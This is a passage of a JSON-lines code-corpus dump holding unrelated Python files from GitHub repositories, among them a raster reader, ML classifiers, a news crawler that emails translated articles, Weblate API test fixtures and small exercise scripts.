GDAL!\")\n # raise GeospatialDataException(\"[ERROR] No CRS found! This may be due to an issue with GDAL!\")\n\n # Create Dictionary to Store Data\n output_dict = {}\n\n # Get data using Rasterio\n for i, band_index in enumerate(dataset.indexes):\n\n # If there is no user-defined datatype, use the original dataset datatype\n if datatype is None:\n datatype = dataset.dtypes[i]\n\n # Read from the dataset into the output dictionary\n output_dict[\"{}\".format(dataset.descriptions[i])] = dataset.read(band_index).astype(datatype)\n\n # Gather data from product name code\n # [FIXME] THE DATA GATHERING REGEX _IS NOT CORRECT_ FOR DATASETS FROM BEFORE 2016-12-06!!!\n name_butchered = re.search(\n pattern=r'S(?P[A-Z,0-9]{2})_MSI(?P[A-Z,0-9]{3})_(?P[0-9]{8}T[0-9]{6})_N(?P[0-9]{4})_R(?P[0-9]{3})_T(?P[A-Z,0-9]{5})_(?P[0-9]{8}T[0-9]{6}).SAFE',\n string=str(dataset.name)\n )\n\n # Get all relevant \"tags\" (metadata from the original file)\n dataset_tags = dataset.tags()\n\n # Vitally important items\n # [TODO] Fix assumption that all SAFE datasets use 16-bit unsigned ints\n # WARNING: Rasterio doesn't seem to recognize nodata for SAFE files!\n nodata_value = np.uint16(dataset_tags['SPECIAL_VALUE_NODATA'])\n saturation_value = np.uint16(dataset_tags['SPECIAL_VALUE_SATURATED'])\n\n # Assemble metadata list\n meta = {\n \"date\": datetime.strptime(name_butchered.group('sensor_start_datetime'), '%Y%m%dT%H%M%S'), # Get only the date using a regex\n \"resolution\": deepcopy(dataset.res),\n \"mission_id\": str(name_butchered.group('mission_id')),\n \"product_level\": str(name_butchered.group('product_level')),\n \"tile_id\": str(name_butchered.group('tile_id')),\n \"processing_baseline_number\": str(name_butchered.group('processing_baseline_number')),\n \"relative_orbit_number\": str(name_butchered.group('relative_orbit_number')),\n \"product_discriminator\": str(name_butchered.group('product_discriminator')),\n \"saturated_value\": saturation_value\n }\n profile = deepcopy(dataset.profile)\n\n # Copy other relevant information to the profile\n profile.data[\"pixel_dimensions\"] = dataset.res\n\n # Create and return new dataset\n return Dataset(profile=profile, bands=output_dict, meta=meta, nodata=nodata_value)\n","repo_name":"adamweingram/RasterPack","sub_path":"raster_pack/io/safe.py","file_name":"safe.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"6475859223","text":"# Пользователь вводит три стороны треугольника,\n# необходимо по формуле Герона рассчитать его площадь и вывести на экран.\n\nside_a = int(input('Введите 1 сторону треугольника: '))\nside_b = int(input('Введите 2 сторону треугольника: '))\nside_c = int(input('Введите 3 сторону треугольника: '))\n\nd = (side_a + side_b + side_c) / 2.0\nsquare = (d * (d - side_a) * (d - side_b) * (d - side_c)) ** 0.5\n\nprint('Площадь треуголника по формуле Герона: ', square)","repo_name":"python-VS/Courses","sub_path":"homework/first_tasks_may/first_task_3.py","file_name":"first_task_3.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22168896820","text":"\"\"\"\nThis module contains the `BlobStorage` class.\n\"\"\"\nimport logging\n\nfrom .exceptions import (BlobStorageMissingCredentialsError,\n BlobStorageUnrecognizedProviderError, )\nfrom .providers import PROVIDERS\nfrom .providers.backblaze import Backblaze\nfrom .providers.exceptions import (ProviderAuthorizationError,\n ProviderFileUploadError)\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass BlobStorage:\n \"\"\"\n Asynchronous object storage interface for common operations, e.g.\n uploading a file to a bucket.\n\n Providers currently supported:\n\n Backblaze.\n \"\"\"\n PROVIDER_ADAPTER = {\n 'backblaze': {\n 'adapter': Backblaze,\n 'required': ('account_id', 'app_key'),\n }\n }\n\n def __init__(self, provider, **kwargs):\n r\"\"\"\n Set the object storage provider.\n\n :param str provider: Name of the object storage provider. Must be one\n of `'backblaze'`.\n :param \\**kwargs: Credentials for the object storage provider, see\n below.\n\n : Keyword arguments:\n * *account_id* (``str``) --\n Account id (Backblaze).\n * *app_key* (``str``) --\n Application key (Backblaze).\n \"\"\"\n LOGGER.debug('Creating instance of `BlobStorage` class')\n if provider not in PROVIDERS:\n raise BlobStorageUnrecognizedProviderError\n if not all(r in kwargs\n for r in self.PROVIDER_ADAPTER[provider]['required']):\n raise BlobStorageMissingCredentialsError\n self.provider = self.PROVIDER_ADAPTER[provider]['adapter'](**kwargs)\n\n async def upload_file(self, bucket_id, file_to_upload):\n \"\"\"\n **async** Upload a single file to the object storage provider.\n\n :param str bucket_id: Object storage provider bucket to upload files\n to.\n :param dict file_to_upload: Local file to upload,\n `{'path': str, 'content_type': str}`.\n :raise ProviderAuthorizationError: If authorization to the object\n storage provider is unsuccessful.\n :raise ProviderFileUploadError: If uploading of the file to the object\n storage provider bucket is unsuccessful.\n :return: Response from object storage provider.\n :rtype: ``dict``\n \"\"\"\n upload_file_meta = (file_to_upload['path'],\n type(self.provider).__name__, bucket_id)\n LOGGER.info('Uploading file \"%s\" to %s bucket %s' % upload_file_meta)\n LOGGER.debug('Authenticating')\n auth_response = await self.provider.authorize()\n if not auth_response:\n raise ProviderAuthorizationError\n LOGGER.debug('Authentication successful')\n LOGGER.debug('Uploading')\n upload_file_response = await self.provider.upload_file(\n bucket_id, file_to_upload['path'], file_to_upload['content_type'])\n if not upload_file_response:\n raise ProviderFileUploadError\n LOGGER.info('Successfully uploaded file \"%s\" to %s bucket %s'\n % upload_file_meta)\n LOGGER.debug(upload_file_response)\n return upload_file_response\n","repo_name":"grking8/aiostorage","sub_path":"aiostorage/blob_storage.py","file_name":"blob_storage.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35403317529","text":"import numpy as np\nfrom sklearn.base import BaseEstimator, ClassifierMixin, clone\nfrom sklearn.utils.validation import check_X_y, check_array, check_is_fitted\n\nclass SurvivalStacking(BaseEstimator, ClassifierMixin):\n \"\"\"Stacking-based survival analysis classifier.\n\n Parameters:\n base_models : list, optional\n List of base classification models for stacking. Default is None.\n meta_model : object, optional\n Meta-classification model for stacking. Default is None.\n\n Attributes:\n base_models : list\n List of base classification models.\n meta_model : object\n Meta-classification model.\n meta_model_ : object\n Fitted meta-classification model.\n\n \"\"\"\n\n def __init__(self, base_models=None, meta_model=None):\n self.base_models = base_models\n self.meta_model = meta_model\n\n def fit(self, X, y, base_models=None):\n \"\"\"Fit the survival stacking model.\n\n Parameters:\n X : array-like, shape (n_samples, n_features)\n Input features for training.\n y : array-like, shape (n_samples,)\n Binary outcome indicating whether an event occurred or not.\n base_models : list, optional\n List of base classification models for stacking. Default is None.\n\n Returns:\n self : object\n\n \"\"\"\n # Validate input arrays X and y\n X, y = check_X_y(X, y)\n\n if base_models is not None:\n self.base_models = base_models\n\n # Fit the base models\n for model in self.base_models:\n model.fit(X, y)\n\n # Fit the meta model using base models' predictions\n meta_features = self._get_base_model_predictions(X)\n\n # Initialize the meta model\n self.meta_model_ = clone(self.meta_model)\n\n # Fit the meta model using base models' predictions\n self.meta_model_.fit(meta_features, y)\n\n return self\n\n def predict(self, X):\n \"\"\"Predict using the survival stacking model.\n\n Parameters:\n X : array-like, shape (n_samples, n_features)\n Input features for prediction.\n\n Returns:\n predictions : array-like, shape (n_samples,)\n Predicted binary outcomes.\n\n Raises:\n NotFittedError : If the model has not been fitted yet.\n\n \"\"\"\n # Check if the model has been fitted\n check_is_fitted(self, 'meta_model_')\n\n # Validate input array X\n X = check_array(X)\n\n # Get base models' predictions and make ensemble predictions\n meta_features = self._get_base_model_predictions(X)\n predictions = self.meta_model_.predict(meta_features)\n\n return predictions\n\n def set_meta_model(self, meta_model):\n \"\"\"Set the meta-classification model.\n\n Parameters:\n meta_model : object\n Meta-classification model for stacking.\n\n \"\"\"\n self.meta_model = meta_model\n\n def set_base_models(self, base_models):\n \"\"\"Set the base classification models.\n\n Parameters:\n base_models : list\n List of base classification models for stacking.\n\n \"\"\"\n self.base_models = base_models\n\n def _get_base_model_predictions(self, X):\n \"\"\"Get predictions from base models.\n\n Parameters:\n X : array-like, shape (n_samples, n_features)\n Input features for prediction.\n\n Returns:\n meta_features : array-like, shape (n_samples, n_base_models)\n Predicted probabilities from base models.\n\n \"\"\"\n # Get predictions from base models\n meta_features = []\n for model in self.base_models:\n predictions = model.predict_proba(X)[:, 1]\n meta_features.append(predictions)\n\n return np.column_stack(meta_features)\n","repo_name":"AlrxKali/BLK_API","sub_path":"stacking_survival_analysis/src/stacking.py","file_name":"stacking.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71652581961","text":"\"\"\"\n 4) Mostrar de los terceros que se tienen en el archivo data.py \n los cuales no poseen ni email o no tengan cellPhone.\n\"\"\"\nfrom data import get_thirds\n\nthirds = get_thirds()\n\nfor third in thirds:\n if not third['email'] or not third['cellPhone']:\n print(third)","repo_name":"jcav67/test-python","sub_path":"test-python/test_4.py","file_name":"test_4.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29198359163","text":"from transformers import ElectraTokenizer\nfrom .model import ElectraForMultiLabelClassification\nfrom pprint import pprint\nimport torch\nimport numpy as np\nimport pickle\n\nfrom .filepath import TOKENIZER_PATH\n\ndef load_model():\n with open(TOKENIZER_PATH, \"rb\") as f:\n tokenizer = pickle.load(f)\n f.close()\n model = ElectraForMultiLabelClassification.from_pretrained(\"monologg/koelectra-base-v3-goemotions\")\n return tokenizer, model\n\ndef predict(text, tokenizer, model):\n inputs = tokenizer(text,return_tensors=\"pt\")\n outputs = model(**inputs)\n scores = 1 / (1 + torch.exp(-outputs[0]))\n threshold = 0\n result = []\n for item in scores:\n labels = []\n scores = []\n for idx, s in enumerate(item):\n if s > threshold:\n labels.append(model.config.id2label[idx])\n scores.append(s.item())\n result.append({\"labels\": labels, \"scores\": scores})\n\n return result","repo_name":"boostcampaitech5/level3_recsys_productserving-recsys-12","sub_path":"fastapi/goemotions/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"11451928830","text":"#Напишите программу для слияния нескольких словарей в один\ndef dict_add(a, b, c):\n new_dict = {**a, **b, **c}\n return print(new_dict)\ndef dict_add_2(a, b, c,):\n new_dict = {}\n for el in (a, b, c):\n new_dict.update(el)\n return print(new_dict)\n\n\nif __name__ == '__main__':\n dict_add_2({1: 3, 2: 43}, {44: 22, 'a': 122}, {'qq': 55, 2222: 'wewew'})","repo_name":"Maks7117/Python","sub_path":"python/Task4_dict.py","file_name":"Task4_dict.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5291441546","text":"import os\nimport random\nimport logging\n\nimport torch\nimport numpy as np\n\nfrom transformers import BertConfig\nfrom transformers import BertTokenizer\n\nfrom model import JointBERT, P_Tuning_V2, Prompt\n\nMODEL_CLASSES = {\n 'bert_en': (BertConfig, JointBERT, BertTokenizer),\n 'bert_ch': (BertConfig, JointBERT, BertTokenizer),\n 'p_tuning_v2_en': (BertConfig, P_Tuning_V2, BertTokenizer),\n 'p_tuning_v2_ch': (BertConfig, P_Tuning_V2, BertTokenizer),\n}\n\n\nMODEL_PATH_MAP = {\n 'bert_en': 'bert-base-uncased',\n 'bert_ch': 'bert-base-chinese',\n 'p_tuning_v2_en': 'bert-base-uncased',\n 'p_tuning_v2_ch': 'bert-base-chinese',\n}\n\n\ndef get_intent_labels(args):\n return [label.strip() for label in open(os.path.join(args.data_dir, args.task, args.intent_label_file), 'r', encoding='utf-8')]\n\n\ndef load_tokenizer(args):\n VOCAB= os.path.join(args.model_name_or_path,MODEL_PATH_MAP[args.model_type] + '-vocab.txt')\n return MODEL_CLASSES[args.model_type][2].from_pretrained(VOCAB)\n\n\ndef init_logger():\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\n\n\ndef set_seed(args):\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if not args.no_cuda and torch.cuda.is_available():\n torch.cuda.manual_seed_all(args.seed)\n\n\ndef compute_metrics(intent_preds, intent_labels,):\n assert len(intent_preds) == len(intent_labels)\n results = {}\n intent_result = get_intent_acc(intent_preds, intent_labels)\n #slot_result = get_slot_metrics(slot_preds, slot_labels)\n sementic_result = get_sentence_frame_acc(intent_preds, intent_labels)\n\n results.update(intent_result)\n #results.update(slot_result)\n results.update(sementic_result)\n\n return results\n\ndef get_intent_acc(preds, labels):\n acc = (preds == labels).mean()\n return {\n \"intent_acc\": acc\n }\n\n\ndef read_prediction_text(args):\n return [text.strip() for text in open(os.path.join(args.pred_dir, args.pred_input_file), 'r', encoding='utf-8')]\n\n\ndef get_sentence_frame_acc(intent_preds, intent_labels):\n \"\"\"For the cases that intent and all the slots are correct (in one sentence)\"\"\"\n # Get the intent comparison result\n intent_result = (intent_preds == intent_labels)\n #sementic_acc = np.multiply(intent_result, slot_result).mean()\n sementic_acc = intent_result.mean()\n return {\n \"sementic_frame_acc\": sementic_acc\n }\n","repo_name":"965694547/Intend-Dection","sub_path":"Intend Detection Program/P-Tuning-V2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"27395104139","text":"import numpy as np\n\ndef plot_posterior(P,case):\n from IPython.core.pylabtools import figsize\n from matplotlib import pyplot as plt\n figsize(11, 9)\n colours = [\"#348ABD\", \"#A60628\"]\t\n\n # For the already prepared, I'm using Binomial's conj. prior.\n k=0\n for pp in P:\n sx = plt.subplot(len(P) / 2, 2, k + 1)\n plt.bar([0, .3], [P[k],1.-P[k]], alpha=0.70, width=0.25,\n color=[colours[1],colours[0]], label= str(k+1)+ \" trials\",\n lw=\"3\", edgecolor=[colours[1],colours[0]])\n\n sx.set_ylim([0.,1.])\n \n if k in [len(P) - 2, len(P) - 1]: \n plt.xticks([0.005, .3], [\"Cancer\", \"No Cancer\"]) \n else:\n plt.xticks([0.005, .3], [\" \", \" \"]) \n \n #plt.title(\"Posterior probability of of Cancer\")\n plt.ylabel(\"Probability\")\n plt.legend()\n\n #plt.autoscale(tight=True)\n k+=1\n\n txt = 'Patient has cancer'\n if case==False:\n txt = 'Patient has no cancer'\n \n plt.suptitle(\"Bayesian updating of posterior probabilities for the case: \" + txt,\n y=1.02,\n fontsize=14)\n\n plt.tight_layout()\n plt.show()\n\n\ndef generate_patient_data(probs,cancer=True,ndata=10):\n data=np.zeros(ndata)\n if (cancer==True):\n for i in range(ndata):\n data[i]=np.random.choice([1, 0], p=[1-probs['P(Neg|Cancer)'], probs['P(Neg|Cancer)']])\n else:\n for i in range(ndata):\n data[i]=np.random.choice([1, 0], p=[probs['P(Pos|No Canver)'], 1.-probs['P(Pos|No Canver)']])\n \n return data\n\ndef get_posterior(probs,data):\n \n Ntot=len(data)\n Npos=np.cumsum(data)\n Nneg=1+np.arange(Ntot)-Npos\n \n P_prior = probs['P(Cancer)']\n P_likelihood = probs['P(Neg|Cancer)']**Nneg*(1.-probs['P(Neg|Cancer)'])**Npos\n P_a = probs['P(Cancer)']*probs['P(Neg|Cancer)']**Nneg*(1.-probs['P(Neg|Cancer)'])**Npos \n P_b = (1.-probs['P(Cancer)'])*(1.-probs['P(Pos|No Canver)'])**Nneg*probs['P(Pos|No Canver)']**Npos \n P_norm = P_a+P_b \n P = P_prior * P_likelihood/(P_norm)\n \n return P\n\n\n","repo_name":"jjasche/lecture_Bayesian_info_theory","sub_path":"lecture1/src/cancer_example.py","file_name":"cancer_example.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22309734538","text":"#此代码主要是从给定腾讯新闻网页中爬取新闻的题目,时间,正文,作者\r\nfrom requests import *\r\nimport requests\r\nimport GoogleTransla\r\nimport json\r\nfrom lxml import etree\r\nimport datetime\r\nimport SendEmail\r\nimport mainApp\r\nimport tkinter\r\nimport pypandoc\r\nimport lxml.etree\r\nfrom lxml.etree import *\r\nimport queue\r\n\r\n\r\ndef getHTMLText(url):\r\n try:\r\n r = requests.get(url,verify='cacert.pem',timeout = 10)\r\n return r.text\r\n except requests.exceptions.ConnectTimeout:\r\n return \"\"\r\n\r\n\r\ndef getLinkList(dic):\r\n url = dic['starturl']\r\n html = getHTMLText(url)\r\n selector = etree.HTML(html)\r\n links = selector.xpath(dic['listXpath'])\r\n return links\r\n\r\ndef getContent(dic,articles,w,isSeen):\r\n links = getLinkList(dic)\r\n if isSeen:\r\n with open(\"seen.json\") as seen:\r\n seenLink = json.load(seen)\r\n else:\r\n seenLink = []\r\n for link in links:\r\n link = dic['OriginalUrl'] + link\r\n if link in seenLink:\r\n w.Scrolledtext1.insert(tkinter.END,\"跳过已抓取\" + link + \"\\n\")\r\n w.Scrolledtext1.update()\r\n continue\r\n else:\r\n seenLink.append(link)\r\n html = getHTMLText(link)\r\n selector = etree.HTML(html)\r\n title = selector.xpath(dic['titleXpath'])\r\n if title:\r\n w.Scrolledtext1.insert(tkinter.END,\"正在抓取:\" + title[0] + \"\\n\")\r\n w.Scrolledtext1.update()\r\n else:\r\n title = '无标题'\r\n time = selector.xpath(dic['timeXpath'])\r\n author = dic['sitename']\r\n paras = selector.xpath(dic['contentXpath'])\r\n #将爬取到的文章用字典格式来存\r\n article = {\r\n 'Title' : str(title).replace(\"'\",\" \").replace('\"',\" \").replace(\"xa0\",\" \"),\r\n 'Link' : str(link),\r\n 'Time' : str(time).replace(\"'\",\" \").replace('\"',\" \"),\r\n 'Paragraph' : str(paras).replace(\"'\",\" \").replace('\"',\" \").replace(\"\\\\\",\" \").replace(\"xa0\",\" \"),\r\n 'Author' : str(author).replace(\"'\",\" \").replace('\"',\" \")\r\n }\r\n if len(article['Paragraph']) > 10: #内容大于10个字符才进入搜索\r\n articles.append(article)\r\n with open(\"seen.json\",'w') as seen:\r\n json.dump(seenLink,seen)\r\n return articles\r\n\r\ndef IOarticle(articles,w, isTransla):\r\n nowTime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')\r\n filename = \"result\\\\\" + nowTime + \".md\"\r\n fo = open(filename, \"w+\", encoding=\"utf-8\")\r\n for article in articles:\r\n fo.writelines(\"# \"+ article['Title'] + \"\\r\\n\")\r\n if isTransla:\r\n t = GoogleTransla.translateGoogle(article['Title'])\r\n fo.writelines(\"**参考译文:**\" + t + \"\\r\\n\")\r\n w.Scrolledtext1.insert(tkinter.END, \"正在翻译\" + t + \"\\r\\n\")\r\n w.Scrolledtext1.update()\r\n fo.writelines(\"**来源:**\" + article['Link'] + \"\\r\\n\")\r\n fo.writelines(article['Time'].strip() + \"\\r\\n\")\r\n if isTransla:\r\n fo.writelines(GoogleTransla.translateGoogle(article['Time'].strip().replace(\"'\",\" \").replace('\"',\" \"))+ \"\\r\\n\")\r\n fo.writelines(\"**正文:**\" + article['Paragraph'] + \"\\r\\n\")\r\n if isTransla:\r\n try:\r\n fo.writelines(\"**参考译文:**\" + GoogleTransla.translateGoogle(article['Paragraph'].replace(\"'\",\" \").replace('\"',\" \") + \"\\n\"))\r\n except:\r\n fo.writelines(\"文本太长,暂时只提供前2000字符的翻译\\r\\n\")\r\n fo.writelines(\"**参考译文:**\" + GoogleTransla.translateGoogle(\r\n article['Paragraph'][:10000].replace(\"'\", \" \").replace('\"', \" \") + \"\\r\\n\"))\r\n fo.writelines(\"\\n **来源网站:**\" + article['Author'] + \"\\r\\n\")\r\n fo.writelines(\"\\r\\n\\n\\n\")\r\n fo.writelines(\"以上文件生成于\" + datetime.datetime.now().strftime('%Y%m%d %H:%M:%S') )\r\n fo.close()\r\n w.Scrolledtext1.insert(tkinter.END, \"抓取文件已生成,在result目录下查找\\r\\n\")\r\n w.Scrolledtext1.update()\r\n with open(\"text.json\",\"w\") as text:\r\n json.dump(articles,text)\r\n return filename\r\n\r\ndef mdTohtmldoc(filename,isDOC,isHTML):\r\n if isDOC:\r\n output = pypandoc.convert_file(filename,'docx',format='md',outputfile=filename[:-3]+\".docx\")\r\n if isHTML:\r\n output = pypandoc.convert_file(filename,'html',format='md',outputfile=filename[:-3]+\".html\",extra_args=[\"--ascii\"])\r\n\r\ndef main(w):\r\n articles = []\r\n with open(\"siteconfig.json\") as site:\r\n webs = json.load(site)\r\n for web in webs:\r\n articles = getContent(web,articles,w);\r\n filename = IOarticle(articles,w)\r\n SendEmail.send_mail(filename,filename,w)\r\n # getWHList(keyWord=\"china\")\r\n\r\n","repo_name":"javawilder/TranslaApp","sub_path":"CrawlWeb.py","file_name":"CrawlWeb.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72408636359","text":"import collections\nimport os\nimport re\nfrom unittest import TestCase\n\nimport httpretty\nfrom requests_toolbelt.multipart import decoder\n\nDATA_TEST_BASE = os.path.join(os.path.dirname(__file__), \"test_data\", \"api\")\n\n\nclass ResponseHandler(object):\n \"\"\"httpretty response handler.\"\"\"\n\n def __init__(self, body, filename, auth=False):\n \"\"\"Construct response handler object.\"\"\"\n self.body = body\n self.filename = filename\n self.auth = auth\n\n def __call__(self, request, uri, headers):\n \"\"\"Call interface for httpretty.\"\"\"\n if self.auth and request.headers[\"Authorization\"] != \"Token KEY\":\n return 403, headers, \"\"\n\n content = self.get_content(request)\n\n return 200, headers, content\n\n def get_content(self, request):\n \"\"\"Return content for given request.\"\"\"\n filename = self.get_filename(request)\n\n if filename is not None:\n with open(filename, \"rb\") as handle:\n return handle.read()\n\n return self.body\n\n def get_filename(self, request):\n \"\"\"Return filename for given request.\"\"\"\n if request.method != \"GET\":\n content_type = request.headers.get(\"content-type\", None)\n\n if content_type is not None and content_type.startswith(\n \"multipart/form-data\"\n ):\n return self.get_multipart_filename(content_type, request)\n else:\n return \"--\".join(\n (self.filename, request.method, request.body.decode(\"ascii\"))\n )\n elif \"?\" in request.path:\n return \"--\".join(\n (self.filename, request.method, request.path.split(\"?\", 1)[-1])\n )\n return None\n\n def get_multipart_filename(self, content_type, request):\n \"\"\"Return filename for given multipart request.\"\"\"\n body = request.body\n multipart_data = decoder.MultipartDecoder(body, content_type)\n multipart_dict = {}\n filename_array = [self.filename, request.method]\n for part in multipart_data.parts:\n content_disposition = part.headers.get(\"Content-Disposition\".encode(), None)\n\n decoded_cd = content_disposition.decode(\"utf-8\")\n multipart_name = self.get_multipart_name(decoded_cd)\n\n multipart_dict[multipart_name] = part.text.replace(\" \", \"-\")\n\n ordered_dict = collections.OrderedDict(sorted(multipart_dict.items()))\n\n for key, value in ordered_dict.items():\n filename_array.append(key + \"=\" + value)\n return \"--\".join(filename_array)\n\n # simple implementation instead of one based on the rfc6266 parser,\n # as rfc6266 fails on python 3.7\n @staticmethod\n def get_multipart_name(content_disposition):\n \"\"\"Return multipart name from content disposition.\"\"\"\n m = re.search(r'name\\s*=\\s*\"(?P[A-Za-z]+)\"', content_disposition)\n\n return m.group(\"name\")\n\n\ndef register_uri(path, domain=\"http://127.0.0.1:8000/api\", auth=False):\n \"\"\"Simplified URL registration.\"\"\"\n filename = os.path.join(DATA_TEST_BASE, path.replace(\"/\", \"-\"))\n url = \"/\".join((domain, path, \"\"))\n with open(filename, \"rb\") as handle:\n httpretty.register_uri(\n httpretty.GET,\n url,\n body=ResponseHandler(handle.read(), filename, auth),\n content_type=\"application/json\",\n )\n httpretty.register_uri(\n httpretty.POST,\n url,\n body=ResponseHandler(handle.read(), filename, auth),\n content_type=\"application/json\",\n )\n httpretty.register_uri(\n httpretty.DELETE,\n url,\n body=ResponseHandler(handle.read(), filename, auth),\n content_type=\"application/json\",\n )\n\n\ndef raise_error(request, uri, headers):\n \"\"\"Raise IOError.\"\"\"\n # pylint: disable=W0613\n raise IOError(\"Some error\")\n\n\ndef register_error(path, code, domain=\"http://127.0.0.1:8000/api\", body=None):\n \"\"\"Simplified URL error registration.\"\"\"\n url = \"/\".join((domain, path, \"\"))\n httpretty.register_uri(httpretty.GET, url, body=body, status=code)\n\n\ndef register_uris():\n \"\"\"Register URIs for httpretty.\"\"\"\n paths = (\n \"changes\",\n \"projects\",\n \"components\",\n \"translations\",\n \"projects/hello\",\n \"projects/hello/changes\",\n \"projects/hello/components\",\n \"projects/hello/statistics\",\n \"projects/hello/languages\",\n \"projects/empty\",\n \"projects/empty/components\",\n \"projects/invalid\",\n \"components/hello/weblate\",\n \"components/hello/android\",\n \"translations/hello/weblate/cs\",\n \"projects/hello/repository\",\n \"components/hello/weblate/repository\",\n \"components/hello/weblate/changes\",\n \"translations/hello/weblate/cs/file\",\n \"translations/hello/weblate/cs/repository\",\n \"translations/hello/weblate/cs/changes\",\n \"components/hello/weblate/statistics\",\n \"translations/hello/weblate/cs/statistics\",\n \"components/hello/weblate/translations\",\n \"components/hello/weblate/lock\",\n \"languages\",\n )\n for path in paths:\n register_uri(path)\n\n register_uri(\"projects/acl\", auth=True)\n\n register_uri(\"projects\", domain=\"https://example.net\")\n register_error(\"projects/nonexisting\", 404)\n register_error(\"projects/denied\", 403)\n register_error(\"projects/throttled\", 429)\n register_error(\"projects/error\", 500)\n register_error(\"projects/io\", 500, body=raise_error)\n\n\nclass APITest(TestCase):\n \"\"\"Base class for API testing.\"\"\"\n\n def setUp(self):\n \"\"\"Enable httpretty and register urls.\"\"\"\n httpretty.enable()\n register_uris()\n\n def tearDown(self):\n \"\"\"Disable httpretty.\"\"\"\n httpretty.disable()\n httpretty.reset()\n","repo_name":"bopopescu/amlak","sub_path":"venv/Lib/site-packages/wlc/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"20183830156","text":"\ndef search_help(arr, low, high, x, position='f'):\n '''\n position: f - first or l - last\n '''\n\n if high >= low:\n mid = (high + low) // 2\n\n if position == 'f' and arr[mid] == x and (mid == 0 or x > arr[mid-1]):\n return mid\n\n if position == 'l' and arr[mid] == x and (mid == high or x < arr[mid+1]):\n return mid\n\n if (position == 'f' and arr[mid] >= x) or (position == 'l' and arr[mid] > x):\n return search_help(arr, low, mid - 1, x, position=position)\n else:\n return search_help(arr, mid + 1, high, x, position=position)\n\n else:\n return -1\n\n\ndef search(arr, low, high, x):\n return (search_help(arr, 0, len(arr)-1, x, 'f'), search_help(arr, 0, len(arr)-1, x, 'l'))\n\n\nif __name__ == '__main__':\n nums = [5, 7, 7, 8, 8, 10]\n print(search(nums, 0, len(nums)-1, 8))\n\n nums = [5, 7, 7, 8, 8, 10]\n print(search(nums, 0, len(nums)-1, 6))\n\n nums = [5, 7, 8, 8, 10]\n print(search(nums, 0, len(nums)-1, 5))\n","repo_name":"SashaKryzh/KPI","sub_path":"1-й курс/Проектирование алгоритмов - РГР/Бінарний пошук/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21749439896","text":"#pip install -U scikit-learn scipy matplotlib\r\n#pip install numpy \r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nfrom sklearn.preprocessing import QuantileTransformer\r\n\r\ndf=pd.read_csv(\".\\diabetes.csv\")\r\ndf=df.drop_duplicates()\r\n\r\ndf['Glucose']=df['Glucose'].replace(0,df['Glucose'].mean())#normal distribution\r\ndf['SkinThickness']=df['SkinThickness'].replace(0,df['SkinThickness'].median())#skewed distribution\r\ndf['BMI']=df['BMI'].replace(0,df['BMI'].median())#skewed distribution\r\n\r\ndf_selected=df.drop(['BloodPressure','Insulin','DiabetesPedigreeFunction',],axis='columns')\r\n\r\ntarget_name='Outcome'\r\ny= df_selected[target_name]#given predictions - training data \r\nX= df_selected.drop(target_name,axis=1)#dropping the Outcome column and keeping all other columns as X\r\n\r\nname_dict = {'Pregnancies':['6'],\t'Glucose':['148'],\t'SkinThickness':['35'],\t'BMI':['33.6'],\t'Age':['50']}\r\nnew_data_df=pd.DataFrame(name_dict)\r\nnew_df = pd.concat([df_selected, new_data_df], axis = 0, join ='inner')\r\n\r\n\r\nx=new_df\r\nquantile = QuantileTransformer()\r\nX = quantile.fit_transform(x)\r\ndf_new=quantile.transform(X)\r\ndf_new=pd.DataFrame(X)\r\ndf_new.columns =['Pregnancies', 'Glucose','SkinThickness','BMI','Age']\r\n\r\n\r\nalist = (df_new.tail(1)).values.tolist()\r\nfor i in alist:\r\n print(i)\r\n input_data = tuple(i)\r\n\r\n\r\n# loading the saved model\r\nloaded_model = pickle.load(open('diabetes_model.sav', 'rb'))\r\n\r\n# changing the input_data to numpy array\r\ninput_data_as_numpy_array = np.asarray(input_data)\r\nprint(\"INP data numpy\", input_data_as_numpy_array)\r\n\r\n# reshape the array as we are predicting for one instance\r\ninput_data_reshaped = input_data_as_numpy_array.reshape(1,-1)\r\nprint(\"input data reshaped\", input_data_reshaped)\r\n\r\nprediction = loaded_model.predict(input_data_reshaped)\r\n#prediction by voting classifier model.\r\nprint(prediction)\r\n\r\nif (prediction[0] == 0):\r\n print('The person is not diabetic')\r\nelse:\r\n print('The person is 